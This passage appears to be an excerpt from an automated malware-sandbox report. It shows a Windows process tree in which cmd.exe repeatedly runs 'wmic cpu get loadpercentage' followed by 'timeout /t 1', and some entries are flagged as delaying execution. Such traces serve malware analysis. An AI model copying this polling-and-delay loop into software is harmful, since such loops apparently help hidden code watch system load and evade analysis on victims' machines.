- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3512
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3828
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4724
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4172
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1484
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2652
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:800
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3320
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:776
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:372
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4176
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2152
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3656
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2460
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1880
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3748
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4328
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3848
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3840
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2020
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1976
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4476
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3560
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2172
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:212
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4140
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:604
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3032
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2288
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2236
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1424
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3368
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2268
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2804
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:348
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:516
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5108
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3516
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4384
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4908
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4836
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4352
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4712
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5036
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4648
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3376
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2132
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3352
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4220
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3404
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4204
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3456
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3932
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3556
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2400
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2392
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2220
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2584
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4944
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4432
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4524
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2204
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4856
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2900
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4496
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2592
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4568
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3924
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3608
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2448
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2012
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4056
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2380
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2464
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2876
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1044
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4644
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1252
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2296
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3444
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:196
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2260
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4636
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3168
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3368
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4628
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3720
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1276
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1800
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3564
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:348
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3712
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5108
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2056
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3256
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4484
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3668
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2224
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2072
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1592
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3376
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2940
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3352
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3964
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3404
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3400
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4012
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3792
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3540
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3604
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4748
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4060
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1708
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:800
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3320
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:408
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3432
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4324
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2168
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2144
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5044
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4068
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4864
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2448
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2772
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2020
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3652
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3616
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4168
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2564
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:192
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3196
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3032
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:224
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2260
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3872
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3856
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1612
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1348
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1048
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4208
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5064
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3892
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:220
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4916
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1128
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3948
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4048
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4484
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2432
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4356
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2224
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2436
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2936
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4904
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3480
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4020
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4560
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4204
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3440
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3932
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4464
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1220
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3888
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4172
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4060
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4052
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:236
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:776
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1020
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:392
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3432
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1632
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4308
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1320
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4088
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1336
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3656
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2168
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2084
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5044
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1996
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:440
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2448
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4056
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4000
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3652
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2004
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1332
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3188
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4764
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1252
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2200
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3444
- - C:\Windows\system32\timeout.exe
